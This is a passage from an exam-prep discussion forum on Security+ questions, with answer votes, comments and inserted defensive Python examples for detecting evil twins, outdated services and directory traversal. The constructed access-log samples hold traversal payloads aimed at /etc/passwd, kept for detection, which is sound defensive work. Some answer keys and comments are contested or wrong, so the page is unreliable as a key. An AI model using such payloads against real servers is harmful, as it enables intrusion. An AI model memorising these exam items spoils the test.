incident and move to the next phase of the incident response process. By tuning the monitoring to reduce false positive rates, the systems
administrator can focus on only the most important data, which can help to speed up the identification phase and improve overall incident
response time.
upvoted 1 times

  Bogardinc 5 days, 8 hours ago


I believe some of you guys have dedicated your lives to input wrong answers to throw everyone off. If you don't have a reference please knock it
off.
upvoted 1 times

  omen679 2 days, 9 hours ago


What is the correct answer?
upvoted 1 times

  G4ct756 3 months, 1 week ago


Selected Answer: B
B, getting accurate reports will allow the analyst to pinpoint the problem fast.
not A, because there is no point focusing on critical assets when the point of entry is likely some host.
not C, because having your logs distributed makes it harder to aggregate.
not D, more sensors will produce more logs for the analyst to sift through.
upvoted 2 times

  ostralo 3 months, 2 weeks ago


Selected Answer: A
FP alerts cost too much time..
upvoted 1 times

  ostralo 3 months, 2 weeks ago


Oh no... I meant to choose B
upvoted 1 times

  ostralo 3 months, 2 weeks ago


A,D will worsen the speed of the identification phase
upvoted 1 times

  nk020 3 months, 2 weeks ago


Selected Answer: A
should be A
upvoted 1 times


  jspecht 3 months, 2 weeks ago


Selected Answer: A
Verbose logging will give you a better idea of exactly what is going on in your environment.
upvoted 2 times

  yasuke 3 months, 1 week ago


verbose logging can also give false +ves if not tuned well
upvoted 1 times

  Granddude 3 months, 3 weeks ago


Selected Answer: D
After reading this article, I believe detection is the key.
https://www.sciencedirect.com/topics/computer-science/incident-response-process
upvoted 4 times

  Papee 3 months, 3 weeks ago


Read the article; nothing about increasing sensors on the environment was mentioned for the Identification Phase. Any better explanation?
upvoted 3 times


Question #254 Topic 1

A security administrator is analyzing the corporate wireless network. The network only has two access points running on channels 1 and 11. While
using airodump-ng, the administrator notices other access points are running with the same corporate ESSID on all available channels and with
the same BSSID of one of the legitimate access points. Which of the following attacks is happening on the corporate network?

A. On-path

B. Evil twin

C. Jamming

D. Rogue access point

E. Disassociation

Correct Answer: B

Community vote distribution


B (100%)

  carpathia 2 months, 3 weeks ago


Selected Answer: B
Same ESSID (SSID) and BSSID (MAC address) = evil twin
upvoted 2 times
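The ESSID/BSSID check carpathia describes, as an added Python example that is not from the thread or the exam: it parses constructed airodump-ng CSV output and separates a known BSSID that shows up on a channel it is not assigned to (evil twin) from an unknown BSSID advertising the corporate name (rogue AP). The corporate ESSID, the two legitimate BSSIDs and their channels 1 and 11 are assumed values.

```python
import csv
from dataclasses import dataclass

# Constructed values for this example: the corporate SSID and the two legitimate
# access points from the question (BSSID -> channel), assumed to sit on channels 1 and 11.
CORP_ESSID = "CorpWiFi"
LEGIT_APS = {
    "AA:BB:CC:DD:EE:01": 1,
    "AA:BB:CC:DD:EE:02": 11,
}

# Constructed airodump-ng CSV capture in the layout `airodump-ng -w` writes:
# an access-point section, a blank line, then the station section. Besides the two
# real APs it contains clones of ...:01 on channels 6 and 3 and an unknown BSSID
# advertising the corporate ESSID.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2023-01-23 09:00:01, 2023-01-23 09:05:10,  1, 54, WPA2, CCMP, PSK, -41, 120, 0,   0.  0.  0.  0,  8, CorpWiFi,
AA:BB:CC:DD:EE:02, 2023-01-23 09:00:01, 2023-01-23 09:05:10, 11, 54, WPA2, CCMP, PSK, -47, 118, 0,   0.  0.  0.  0,  8, CorpWiFi,
AA:BB:CC:DD:EE:01, 2023-01-23 09:02:30, 2023-01-23 09:05:10,  6, 54, WPA2, CCMP, PSK, -35, 300, 0,   0.  0.  0.  0,  8, CorpWiFi,
AA:BB:CC:DD:EE:01, 2023-01-23 09:02:31, 2023-01-23 09:05:10,  3, 54, WPA2, CCMP, PSK, -36, 298, 0,   0.  0.  0.  0,  8, CorpWiFi,
DE:AD:BE:EF:00:01, 2023-01-23 09:03:00, 2023-01-23 09:05:10,  6, 54, OPN, , , -52, 40, 0,   0.  0.  0.  0,  8, CorpWiFi,
12:34:56:78:9A:BC, 2023-01-23 09:00:01, 2023-01-23 09:05:10,  6, 54, WPA2, CCMP, PSK, -70, 90, 0,   0.  0.  0.  0,  8, GuestNet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
0A:0B:0C:0D:0E:0F, 2023-01-23 09:00:05, 2023-01-23 09:05:10, -50, 33, AA:BB:CC:DD:EE:01, CorpWiFi
"""


@dataclass(frozen=True)
class Finding:
    bssid: str
    channel: int
    essid: str
    verdict: str  # "legitimate", "evil-twin" or "rogue-ap"


def parse_access_points(csv_text):
    """Return (bssid, channel, essid) tuples from the AP section of an airodump-ng CSV."""
    aps = []
    in_ap_section = False
    for row in csv.reader(csv_text.splitlines(), skipinitialspace=True):
        if not row or not row[0].strip():
            if in_ap_section:
                break  # the blank line ends the AP section; stations follow
            continue
        if row[0].strip() == "BSSID":
            in_ap_section = True  # header row of the AP section
            continue
        if not in_ap_section or len(row) < 14:
            continue
        try:
            channel = int(row[3])
        except ValueError:
            continue  # airodump-ng writes nothing usable when the channel is unknown
        aps.append((row[0].strip().upper(), channel, row[13].strip()))
    return aps


def classify_access_points(csv_text, corp_essid=CORP_ESSID, legit_aps=LEGIT_APS):
    """Classify every AP that advertises the corporate ESSID.

    legitimate : a known BSSID on the channel it is assigned to
    evil-twin  : a known BSSID cloned onto a channel it is not assigned to
    rogue-ap   : an unknown BSSID advertising the corporate ESSID
    A clone that also copies the legitimate channel is not caught by this check;
    that case needs beacon-rate or signal-strength anomalies.
    """
    legit = {b.upper(): ch for b, ch in legit_aps.items()}
    findings = []
    for bssid, channel, essid in parse_access_points(csv_text):
        if essid != corp_essid:
            continue  # neighbouring networks are out of scope for this check
        if bssid not in legit:
            verdict = "rogue-ap"
        elif channel != legit[bssid]:
            verdict = "evil-twin"
        else:
            verdict = "legitimate"
        findings.append(Finding(bssid, channel, essid, verdict))
    return findings


def cloned_channels(findings):
    """Map each cloned BSSID to the sorted list of channels it was cloned onto."""
    report = {}
    for f in findings:
        if f.verdict == "evil-twin":
            report.setdefault(f.bssid, []).append(f.channel)
    return {b: sorted(chs) for b, chs in report.items()}


if __name__ == "__main__":
    results = classify_access_points(SAMPLE_CSV)
    for f in results:
        print(f"{f.bssid}  ch {f.channel:>2}  {f.essid:<10} {f.verdict}")
    print("cloned BSSIDs:", cloned_channels(results))
```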

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Evil Twin

Evil twin attacks are a type of Man in the Middle (MitM) attack in which a fake Wi-Fi network is set up to steal information or further infiltrate a
connecting device. This is often done in public settings where people are most likely to look for or connect to freely available Wi-Fi.

The evil twins here are the access points with the same SSID as the legitimate access points.
upvoted 1 times

  Tomtom11 3 months ago


Selected Answer: B
https://www.professormesser.com/security-plus/sy0-501/rogue-access-points/
upvoted 1 times

  passmemo 3 months, 3 weeks ago


Selected Answer: B
B is the answer
upvoted 2 times

  Kashim 3 months, 3 weeks ago


Selected Answer: B
B Correct

https://security.stackexchange.com/questions/152816/whats-the-difference-between-an-evil-twin-and-a-rogue-access-point
upvoted 4 times

  Skelter721 3 months, 4 weeks ago


Shouldn’t this be D?
upvoted 1 times

  Skelter117 3 months, 3 weeks ago


It's B as the SSID details are the same
upvoted 1 times


Question #255 Topic 1

When implementing automation with IoT devices, which of the following should be considered FIRST to keep the network secure?

A. Z-Wave compatibility

B. Network range

C. Zigbee configuration

D. Communication protocols

Correct Answer: D

Community vote distribution


D (53%) C (47%)

  Kashim Highly Voted  3 months, 3 weeks ago


Selected Answer: D
I guess communication protocols is the best option here.
upvoted 10 times

  blacktaliban Highly Voted  2 months, 2 weeks ago


Selected Answer: C
Going with C.

Got my test today 11.19.22 :)


upvoted 5 times

  itsmorphintime 2 months, 1 week ago


did you find the questions from examtopics relevant to the actual test?
upvoted 1 times

  ZDW Most Recent  4 days, 13 hours ago


Selected Answer: D
This should be D. While Zigbee is a communications protocol, it is not the only option to choose from. Because of this, Zigbee is not the only
option that needs to be considered.
upvoted 1 times

  Ranaer 2 weeks, 2 days ago


Selected Answer: C
I don't know if people know that, but some questions have multiple correct answers, which all give points, even if a different amount. In this
particular question I believe both C and D are correct. Zigbee IS a communication protocol, which is solely focused on IoT devices, which I
believe is the better answer here. However selecting D would still be considered correct in my opinion, but since it is not as directly linked to IoT
devices as Zigbee, it would simply net you less points.
upvoted 1 times

  RvR109 3 weeks, 4 days ago


Selected Answer: D
"Before taking the leap and deploying an IoT solution, it is critical to know the limiting factors of each technology. Communication protocols are
the set of rules established between nodes to exchange information in a reliable and safe manner."

https://www.allaboutcircuits.com/technical-articles/internet-of-communication-communication-protocols-network-protocols/
upvoted 1 times

  mick1 1 month ago


Where did you get the info that all IoT devices work with Zigbee? There is not even info that it is wireless. For me it is D
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: D
D is the answer..
upvoted 3 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
To keep an IoT network secure, the first thing that should be considered is the communication protocols that will be used. This is because the
communication protocols dictate how the devices on the network will communicate with each other, and using secure protocols can help prevent
unauthorized access to the network and the devices on it. Other factors, such as the range and compatibility of the network and the
configuration of the devices, are also important, but they should be considered after the communication protocols have been securely
implemented.
upvoted 2 times
  Blueteam 2 months, 1 week ago
Bad question. However the best answer is C.
The most important factor in IoT security is following secure configuration of devices.
Both Z-Wave and Zigbee are used for IoT. The most important factor is the configuration of them.
upvoted 2 times

  carpathia 2 months, 3 weeks ago


Selected Answer: C
The only weakness re IoT stated in a Comptia book I am studying is weak defaults, so that would point to the Zigbee config aka change the
default password etc whatever is there.
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: C
Answer: Zigbee configuration

I don't think this is the first consideration but doesn't matter I guess. Zigbee is a wireless specification to address the needs of low-cost, low-power
wireless IoT data networks.
upvoted 2 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
D is the broad answer here, but I think that CompTIA would like to hear that you actually know about Zigbee being used with IoT devices, so I'd
go with Zigbee
upvoted 3 times

  Lilibell 3 months ago


I choose C
https://www.develcoproducts.com/gateways/wireless-protocols/zigbee/zigbee-home-automation/
upvoted 1 times

  simsbow1098 3 months, 1 week ago


Selected Answer: C
I will be the odd man out here. Correct me if I am wrong please. If I have learned anything from CompTIA exams, they are very particular about
key words or phrases. From the book: "Zigbee is a network protocol that is designed for personal area networks like those found in houses for
home automation". Also it is the only one in the exam objectives.
upvoted 4 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: D
A and C are the same thing. So it isn't either one of those. I don't know how the Network Range makes something more secure in this
case...so...I have to go with D.
upvoted 2 times

  NXPERT 3 months, 2 weeks ago


B is the answer; the other three are basically the same: Zigbee = Z-Wave = communication protocols.
upvoted 3 times


Question #256 Topic 1

An organization is concerned that its hosted web servers are not running the most updated version of the software. Which of the following would
work BEST to help identify potential vulnerabilities?

A. hping3 -S comptia-org -p 80

B. nc -l -v comptia.org -p 80

C. nmap comptia.org -p 80 -sV

D. nslookup –port=80 comptia.org

Correct Answer: C

Community vote distribution


C (100%)

  Skelter117 Highly Voted  3 months, 3 weeks ago


Selected Answer: C
Nmap -sV flag detects the (s)ervice (V)ersion on what you are scanning Source: personal pentesting experience
upvoted 7 times
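As an added Python example (not from the thread or the exam) of what to do with the -sV output once you have it: a parser for nmap's grepable (-oG) format that pulls out each open port's service banner and flags services below an approved minimum version, which is the "identify potential vulnerabilities" step the question is after. The scan output, hostname, addresses and version baseline are all constructed.

```python
import re
from dataclasses import dataclass

# Constructed nmap grepable (-oG) output, in the shape a command such as
# `nmap web.example.test -p 80,443,8080 -sV -oG -` produces. Host, addresses
# and banners are made up for the example.
SAMPLE_GNMAP = (
    "# Nmap 7.93 scan initiated Mon Jan 23 10:00:00 2023 as: nmap -sV -p 80,443,8080 -oG - web.example.test\n"
    "Host: 198.51.100.10 (web.example.test)\tStatus: Up\n"
    "Host: 198.51.100.10 (web.example.test)\tPorts: "
    "80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/, "
    "443/open/tcp//ssl|http//Apache httpd 2.4.41 ((Ubuntu))/, "
    "8080/open/tcp//http-proxy//nginx 1.22.1/\tIgnored State: closed (997)\n"
    "# Nmap done at Mon Jan 23 10:00:09 2023 -- 1 IP address (1 host up) scanned in 9.12 seconds\n"
)

# Constructed baseline: the lowest build the organisation has approved per product.
APPROVED_MINIMUM = {
    "Apache httpd": (2, 4, 54),
    "nginx": (1, 22, 1),
}


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    name: str
    version: str  # raw -sV banner, e.g. "Apache httpd 2.4.41 ((Ubuntu))"


# Grepable port entries are '/'-separated: port/state/proto/owner/service/rpc/version/
# A literal slash inside a banner is escaped as '\/', so only split on unescaped ones.
_FIELD_SPLIT = re.compile(r"(?<!\\)/")


def parse_gnmap_services(text):
    """Return one Service per open port found in nmap -oG output."""
    services = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue
        host = line.split()[1]
        ports_blob = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        for entry in ports_blob.split(", "):
            fields = _FIELD_SPLIT.split(entry)
            if len(fields) < 7:
                continue
            port, state, proto, _owner, name, _rpc, version = fields[:7]
            if state != "open":
                continue
            services.append(Service(host, int(port), proto, name, version.replace("\\/", "/")))
    return services


# Product name followed by a dotted numeric version; trailing extras like "((Ubuntu))" are ignored.
_VERSION = re.compile(r"^(?P<product>.*?)\s+(?P<ver>\d+(?:\.\d+)+)")


def split_banner(banner):
    """'Apache httpd 2.4.41 ((Ubuntu))' -> ('Apache httpd', (2, 4, 41)); None if no version present."""
    m = _VERSION.match(banner)
    if not m:
        return None
    return m.group("product"), tuple(int(p) for p in m.group("ver").split("."))


def outdated_services(services, approved=APPROVED_MINIMUM):
    """Return (service, running, minimum) for each banner below the approved minimum."""
    findings = []
    for svc in services:
        parsed = split_banner(svc.version)
        if parsed is None:
            continue  # -sV could not fingerprint a version; leave for manual review
        product, running = parsed
        minimum = approved.get(product)
        if minimum is not None and running < minimum:
            findings.append((svc, running, minimum))
    return findings


if __name__ == "__main__":
    for svc, running, minimum in outdated_services(parse_gnmap_services(SAMPLE_GNMAP)):
        print(f"{svc.host}:{svc.port} {svc.name}: {svc.version} is below approved {minimum}")
```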

  passmemo 3 months, 3 weeks ago


Selected Answer: C
Nmap on port 80
upvoted 1 times


Question #257 Topic 1

A news article states hackers have been selling access to IoT camera feeds. Which of the following is the MOST likely reason for this issue?

A. Outdated software

B. Weak credentials

C. Lack of encryption

D. Backdoors

Correct Answer: B

Community vote distribution


B (93%) 7%

  Kashim Highly Voted  3 months, 3 weeks ago


Selected Answer: B
Most of the IoT devices have the same password given by the manufacturer. In my opinion B (Weak credentials) is the most common point of
attack.
upvoted 7 times

  shitgod 1 month, 1 week ago


The quality of this question is really bad.
upvoted 5 times

  Tomtom11 Most Recent  3 months ago


Selected Answer: B
Weak defaults are a condition where default
conditions are generally known, including admin account and password,
leaving the system completely vulnerable to an attacker.
upvoted 2 times

  560exam 2 months ago


If the credentials are generally known, they would probably be free. The question says "Hackers are selling the creds"
upvoted 1 times

  lordguck 3 months ago


I go for B. IoT devices are not only cheap China/Taiwan products with no support/updates, but also high-quality devices, e.g. by Axis or Mobotix, who
update their firmware/software to close backdoors/vulnerabilities, if found.
upvoted 1 times

  ostralo 3 months, 2 weeks ago


https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/

default password
upvoted 2 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: B
A Outdated software implies someone exploited a vulnerability to gain access vs B People used Weak credentials such as default passwords,
that seems more likely to me.
upvoted 4 times

  ksave 3 months, 3 weeks ago


Selected Answer: A
Outdated software since software updates by vendors are very limited in IoT devices
upvoted 1 times

  [Removed] 3 months, 4 weeks ago


A. Outdated software
upvoted 3 times


Question #258 Topic 1

A company wants to build a new website to sell products online. The website will host a storefront application that will allow visitors to add
products to a shopping cart and pay for the products using a credit card. Which of the following protocols would be the MOST secure to
implement?

A. SSL

B. SFTP

C. SNMP

D. TLS

Correct Answer: D

Community vote distribution


D (92%) 8%

  Granddude Highly Voted  3 months, 3 weeks ago


Selected Answer: D
Transport Layer Security (TLS) is the successor protocol to SSL. TLS is an improved version of SSL. It works in much the same way as the SSL,
using encryption to protect the transfer of data and information. The two terms are often used interchangeably in the industry although SSL is still
widely used.

https://www.websecurity.digicert.com/security-topics/what-is-ssl-tls-
https#:~:text=Transport%20Layer%20Security%20(TLS)%20is,SSL%20is%20still%20widely%20used.
upvoted 7 times

  mike47 Most Recent  4 days, 21 hours ago


Selected Answer: D
SFTP deals with file transfer and SNMP deals with network devices such as routers & switches.
TLS is the improved version of SSL. TLS has higher and way more reliable security than SSL. Therefore D: TLS is the answer.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The most secure protocol to implement for a website that allows visitors to pay for products using a credit card would be TLS (Transport Layer
Security). This protocol is designed to provide secure communications over a computer network and can be used to protect the transmission of
sensitive information, such as credit card numbers and other personal data. SSL (Secure Sockets Layer) is an older protocol that has largely been
replaced by TLS, so it would not be the best choice for this type of application. SFTP (SSH File Transfer Protocol) is a secure file transfer
protocol, but it is not typically used for transmitting sensitive information like credit card numbers. SNMP (Simple Network Management Protocol)
is a protocol used for managing network devices, but it does not provide the same level of security as TLS.
upvoted 1 times

  Tomtom11 3 months ago


Selected Answer: D
Hypertext Transfer Protocol Secure (HTTPS) is the use of SSL or TLS to
encrypt a channel over which HTTP traffic is transmitted. Because of issues
with all versions of SSL, only TLS is recommended for use.
upvoted 2 times

  comeragh 3 months, 2 weeks ago


Selected Answer: D
D - TLS. Agreed.
upvoted 1 times

  Dachosenone 3 months, 3 weeks ago


Selected Answer: A
SSL is more specific than TLS
upvoted 1 times

  banditring 3 months, 3 weeks ago


well SSL has problems too lol
upvoted 1 times

  alayeluwa 3 months, 3 weeks ago


TLS is the new SSL.
upvoted 4 times


  Skelter117 3 months, 3 weeks ago


Well we know TLS is secure but everyone still refers to the TLS as SSL. wonder if that context applies here.
upvoted 2 times

  Granddude 3 months, 3 weeks ago


I am going with TLS as it is the newest and listed as one of the answers.
upvoted 2 times


Question #259 Topic 1

An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced
due to loss, damage, or theft steadily increased by 10%. Which of the following would BEST describe the estimated number of devices to be
replaced next year?

A. ALE

B. ARO

C. RPO

D. SLE

Correct Answer: A

Community vote distribution


B (81%) A (19%)

  dansecu Highly Voted  3 months, 4 weeks ago


Selected Answer: B
ARO - annualized rate of occurrence is a representation of the frequency of the event, measured in a standard year. In our case the number of
defective devices per year.
Annual loss expectancy (ALE) is the loss (amount of money) due to ARO.
The question is about the number of devices, not about money.
upvoted 19 times

  P0wned Most Recent  2 weeks, 5 days ago


Selected Answer: A
Annual Loss Expectancy (ALE) is a measure of the estimated financial loss that an organization can expect to incur over a given period of time. In
this scenario, the IT manager is trying to estimate the number of devices that will need to be replaced next year due to loss, damage, or theft.
The IT manager is aware that the number of devices that were replaced over the last five years has steadily increased by 10%. To estimate the
number of devices that will need to be replaced next year, the IT manager would use the ALE formula: ALE = SLE x ARO.
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it buddy. Hit the books
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: B
B is the Answer
upvoted 1 times

  EubertT 1 month, 4 weeks ago


Here are two hints of the question: the mobile device budget for the upcoming year = the estimated number of devices to be replaced next year.
For this reason I believe is A.= ALE
upvoted 1 times

  Sandon 1 week, 2 days ago


ALE is the $ amount. Answer is ARO
upvoted 1 times

  Rusher 2 months, 2 weeks ago


Selected Answer: B
I'm going with B
upvoted 1 times

  carpathia 2 months, 3 weeks ago


Selected Answer: B
"number of devices", not $$$.
ARO
upvoted 3 times

  Ashbash95 2 months, 4 weeks ago


Selected Answer: A
Answer is ALE
upvoted 1 times

  Sir_Learnalot 3 months ago


Selected Answer: B
ARO should be correct. They asked for the expected number of devices, not the costs for them. If they'd asked for the cost it would be ALE, as it's
ALE = ARO*SLE
upvoted 2 times

  studant_devsecops 3 months, 2 weeks ago


Selected Answer: A
ALE - Annual Loss Expectancy. (ALE = SLE(single loss exp.)*ARO(annual rate of occur.))
upvoted 2 times

  ergo54 3 months, 3 weeks ago


Selected Answer: B
Annualized Loss Expectancy (ALE) is the expected monetary loss that can be expected for an asset due to a risk over a one year period. This
question is asking about loss of devices in a year
upvoted 4 times

  passmemo 3 months, 3 weeks ago


Selected Answer: A
An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced
due to loss, damage, or theft steadily increased by 10%. Which of the following would BEST describe the estimated number of devices to be
replaced next year?
upvoted 3 times

  passmemo 3 months, 3 weeks ago


Annual Loss Expectancy (ALE), which is the total loss we can expect from a risk in a one-year timeframe and is calculated by multiplying SLE
by ARO
upvoted 1 times

  [Removed] 3 months, 4 weeks ago


• ALE (Annualized Loss Expectancy)
upvoted 2 times

  kt01 3 months, 4 weeks ago


I agree. It's ALE.
upvoted 1 times

Question #260 Topic 1

An organization is repairing the damage after an incident. Which of the following controls is being implemented?

A. Detective

B. Preventive

C. Corrective

D. Compensating

Correct Answer: C

Community vote distribution


C (89%) 11%

  alayeluwa Highly Voted  3 months, 3 weeks ago


Selected Answer: C
Correcting their mistake lol
upvoted 6 times

  Alizadeh Most Recent  1 month, 1 week ago


Selected Answer: C
C. Corrective controls are being implemented.

Corrective controls are measures that are put in place to fix problems or weaknesses that have been identified. They are typically implemented
after an incident has occurred in order to repair the damage and prevent similar incidents from happening in the future. In this scenario, the
organization is repairing the damage after an incident, which suggests that corrective controls are being implemented.

Detective controls are measures that are put in place to detect when a problem or weakness has occurred. Preventive controls are measures that
are put in place to prevent problems or weaknesses from occurring in the first place. Compensating controls are measures that are put in place to
compensate for weakness or deficiency in another control.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
When an organization is repairing the damage after an incident, they are implementing corrective controls. Corrective controls are measures that
are put in place to fix problems or address vulnerabilities that have already been identified. This is in contrast to preventive controls, which are
measures that are put in place to prevent problems from occurring in the first place, and detective controls, which are measures that are put in
place to detect problems or vulnerabilities before they can cause harm. Compensating controls are additional controls that are put in place to
provide additional protection or to compensate for the shortcomings of other controls. In this case, the organization is taking corrective action to
repair the damage caused by the incident.
upvoted 1 times

  Zaado 3 months, 2 weeks ago


A compensating control, also called an alternative control, is a mechanism that is put in place to satisfy the requirement for a security measure
that is deemed too difficult or impractical to implement at the present time.

So it has to be corrective.
upvoted 2 times

  NXPERT 3 months, 2 weeks ago


D: Compensating. The question didn't say "patched the intrusion"; it clearly says "recovering from damage".
upvoted 1 times

  ostralo 3 months, 2 weeks ago


I disagree,
Compensating controls are alternative controls used when a primary control is not feasible.

Corrective controls attempt to reverse the impact of an incident.

https://purplesec.us/security-controls/
upvoted 2 times

  abrilo 3 months, 2 weeks ago


Selected Answer: D
A compensating control attempts to recover from an intrusion by compensating for the issues that were left behind. For example, if someone
stole a laptop with all of our data, we could compensate for that by purchasing a new laptop and restoring that data from backup.

A corrective control is designed to mitigate any damage that occurred because of a security event. For example, an IPS (intrusion prevention
system) can identify an attack on the network and block that traffic from entering the rest of the network.
upvoted 1 times

  Ranaer 2 weeks, 2 days ago


Absolutely incorrect.

Compensating control is an alternative method, which you are using because either there is no other way to prevent that risk, or the baseline
solution is currently unavailable, thus you need something in place until it becomes available.
Example: The standard in a company to access the server room is a biometric scanner. However, the office in buttfuck nowhere doesn't have
that specific biometric scanner available and it will take 2 months to get it delivered. You can't leave the server room unsecured, so you put a
padlock on the door. That padlock is a compensating control.
upvoted 2 times

Question #261 Topic 1

A Chief Executive Officer’s (CEO) personal information was stolen in a social-engineering attack. Which of the following sources would reveal if
the CEO’s personal information is for sale?

A. Automated information sharing

B. Open-source intelligence

C. The dark web

D. Vulnerability databases

Correct Answer: C

Community vote distribution


C (100%)

  Gino_Slim 3 months, 1 week ago


Selected Answer: C
Dark Web for sure.
upvoted 1 times

  nobnarb 3 months, 2 weeks ago


Selected Answer: C
The dark web is where you go for the purchase of illegal items, but damn ima bout to fail this exam lol.
upvoted 4 times

  TheGinjaNinja 2 months ago


Hopefully, you didn't :)
or if you haven't taken it yet- You got this!
upvoted 2 times

Question #262 Topic 1

Which of the following typically uses a combination of human and artificial intelligence to analyze event data and take action without intervention?

A. TTP

B. OSINT

C. SOAR

D. SIEM

Correct Answer: C

Community vote distribution


C (100%)

  Granddude Highly Voted  3 months, 3 weeks ago


Selected Answer: C
What is SOAR? SOAR collects data and alerts security teams using a centralized platform similar to SIEM, but SIEM only sends alerts to security
analysts. SOAR security, on the other hand, takes it a step further by automating the responses. It uses artificial intelligence (AI) to learn pattern
behaviors, which enable it to predict similar threats before they happen. This makes it easier for IT security staff to detect and address threats.

https://www.fortinet.com/resources/cyberglossary/what-is-soar
upvoted 11 times

  passmemo 3 months, 3 weeks ago


Agree with C
upvoted 3 times

  ronniehaang Most Recent  3 days, 22 hours ago


Selected Answer: C
C. SOAR (Security Operations Automation and Response) typically uses a combination of human and artificial intelligence to analyze event data
and take action without intervention. This technology automates manual tasks, such as triage, investigation, and remediation, to improve the
speed and efficiency of incident response. By using machine learning algorithms and a knowledge base, SOAR can learn from previous incidents
and make more informed decisions, freeing up security personnel to focus on higher-level tasks.
upvoted 1 times

  Gr3gg3 2 months, 3 weeks ago


Human and artificial with no intervention? I think it's OSINT
upvoted 1 times

  Gr3gg3 2 months, 3 weeks ago


Didn't read the Q properly - take action without intervention = I agree with C
upvoted 2 times

  Skelter117 3 months, 3 weeks ago


but does it mean without human intervention or artificial intelligence intervention?
upvoted 1 times

Question #263 Topic 1

A security analyst has been tasked with creating a new WiFi network for the company. The requirements received by the analyst are as follows:

* Must be able to differentiate between users connected to WiFi
* The encryption keys need to change routinely without interrupting the users or forcing reauthentication
* Must be able to integrate with RADIUS
* Must not have any open SSIDs

Which of the following options BEST accommodates these requirements?

A. WPA2-Enterprise

B. WPA3-PSK

C. 802.11n

D. WPS

Correct Answer: A

Community vote distribution


A (100%)

  Granddude Highly Voted  3 months, 3 weeks ago


Selected Answer: A
WPA2-Enterprise
Deploying WPA2-Enterprise requires a RADIUS server, which handles the task of authenticating network users access. The actual authentication
process is based on the 802.1x policy and comes in several different systems labelled EAP. Because each device is authenticated before it
connects, a personal, encrypted tunnel is effectively created between the device and the network.

https://www.securew2.com/solutions/wpa2-enterprise-and-802-1x-simplified
upvoted 11 times

  Fuzm4n Most Recent  3 months, 3 weeks ago


PSK eliminated in WPA3. WPA2-Enterprise makes sense.
upvoted 4 times

Question #264 Topic 1

A security administrator is trying to determine whether a server is vulnerable to a range of attacks. After using a tool, the administrator obtains the
following output:

Which of the following attacks was successfully implemented based on the output?

A. Memory leak

B. Race conditions

C. SQL injection

D. Directory traversal

Correct Answer: D

Community vote distribution


D (88%) 13%

  Thapas Highly Voted  3 months, 2 weeks ago


Directory traversal is a type of HTTP exploit that is used by attackers to gain unauthorized access to restricted directories and files
upvoted 9 times

  FMMIR Most Recent  2 months ago


Selected Answer: D
Directory traversal is a type of HTTP exploit that is used by attackers to gain unauthorized access to restricted directories and files
upvoted 2 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: D
This looks like the output of a successful directory traversal attack. The attacker was able to view the contents of the /etc/passwd file on a
Linux server (that would look something like the output presented here).
upvoted 3 times

  comeragh 2 months, 3 weeks ago


Selected Answer: D
D - directory traversal. SQLi is 1=1 or 0=0 for example not 1:1.
upvoted 2 times

  ankit_1606 2 months, 3 weeks ago


J_Ark1, SQL injection is ' OR '1'='1. Source: Wikipedia
upvoted 1 times

  J_Ark1 2 months, 3 weeks ago


Selected Answer: C
"1:1" - SQL injection correct me if im wrong
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it
upvoted 1 times
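Two defender-side pieces for the traversal scenario discussed above, as an added example that is not part of the exam page: a path resolver that refuses anything escaping a fixed web root, and a scan over constructed access-log lines that flags `..` components even when URL-encoded or double-encoded (the log lines, addresses and the web root are assumptions for this example).

```python
"""Directory-traversal defence and detection (added example, not from the
exam page). resolve_under_root() refuses any user-supplied path that escapes
a fixed web root; find_traversal_attempts() flags request-log lines whose
path or query values contain '..' path components, including URL-encoded and
double-encoded forms. The log lines below are constructed for this example."""
import os
import re
import tempfile
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache-style access log (constructed sample; 203.0.113.0/24 is a documentation range)
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jan/2023:10:00:01 +0000] "GET /images/logo.png HTTP/1.1" 200 512
203.0.113.9 - - [20/Jan/2023:10:00:02 +0000] "GET /download?file=../../../../etc/passwd HTTP/1.1" 200 1844
203.0.113.9 - - [20/Jan/2023:10:00:03 +0000] "GET /download?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1844
203.0.113.9 - - [20/Jan/2023:10:00:04 +0000] "GET /download?file=%252e%252e%252fetc/passwd HTTP/1.1" 404 0
203.0.113.7 - - [20/Jan/2023:10:00:05 +0000] "GET /docs/readme..txt HTTP/1.1" 200 30
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# A '..' that stands alone as a path component (so 'readme..txt' is not flagged).
DOTDOT_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def resolve_under_root(root, user_path):
    """Resolve user_path relative to root and return the real path, or raise
    PermissionError if the result lies outside root. The check is done on the
    canonical path (symlinks and '..' resolved), not on the request string,
    so encoding tricks cannot bypass it."""
    root_real = os.path.realpath(root)
    # Decode once; strip leading '/' so os.path.join cannot discard the root.
    relative = unquote(user_path).lstrip("/")
    candidate = os.path.realpath(os.path.join(root_real, relative))
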